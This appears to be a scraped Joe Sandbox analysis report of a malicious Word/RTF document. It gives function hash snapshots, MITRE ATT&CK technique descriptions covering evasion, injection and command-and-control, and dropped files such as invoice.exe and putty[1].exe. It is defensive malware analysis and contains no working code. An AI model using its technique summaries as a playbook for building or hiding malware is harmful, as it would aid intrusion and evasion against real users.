Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: DownlevelLocaleName__crttry_get_function
String ID: LocaleNameToLCID
API String ID: 404522899-2050040251
Opcode ID: 769a50ad9c83e7e7b8095d67483af8383d9f58b45203e49c10e0a29e2b2eac5f
Instruction ID: 64d0155ac1e505f2f4a0d5f65b6fd5cb0566580c78904edcdcfd61354ef574d6
Opcode Fuzzy Hash: 769a50ad9c83e7e7b8095d67483af8383d9f58b45203e49c10e0a29e2b2eac5f
Instruction Fuzzy Hash: 0EE01232F0064591FA159F96F8597ED2321AB88780F99503ED51D07676DE3CCB97C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE5A68 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000013FDE5A91
TlsSetValue.KERNEL32(?,?,?,000000013FDE65D7,?,?,?,000000013FDDF335,?,?,?,?,000000013FDE76D5), ref: 000000013FDE5AA8

Strings

FlsSetValue, xrefs: 000000013FDE5A7E

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 1c8322544b560abbf78b58be5ebfce2891d9f6a69ac5aae2c74af47cbe636929
Instruction ID: e5cd068acde855a3bcad78dcd50ee8e15d4cec2447410788f26667d194dfcdda
Opcode Fuzzy Hash: 1c8322544b560abbf78b58be5ebfce2891d9f6a69ac5aae2c74af47cbe636929
Instruction Fuzzy Hash: D9E01276B00A45A1FB095F95F8447D52362EB487C0F59503ED91D063B6CE39CA9BC750

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report doc.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Sigma Signatures

Exploits

System Summary

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\invoice.exe

C:\Users\user\Desktop\~$doc.doc

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
doc.doc

Function 000000013FD548EC Relevance: 680.9, Strings: 541, Instructions: 4630
COMMON

Function 000000013FD6FE0C Relevance: 263.0, Strings: 209, Instructions: 1738
COMMON

Function 000000013FDC9DC7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83
librarystringloaderCOMMON

Function 000000013FDCFA4E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55
registryCOMMON

Function 000000013FDBA6A4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
windowCOMMON

Function 000000013FD72305 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 373
COMMON

Function 000000013FDE5CCC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
COMMONLIBRARYCODE

Function 000000013FDBA610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45
windowCOMMON

Function 000000013FDC9F02 Relevance: 4.5, APIs: 3, Instructions: 45
libraryCOMMON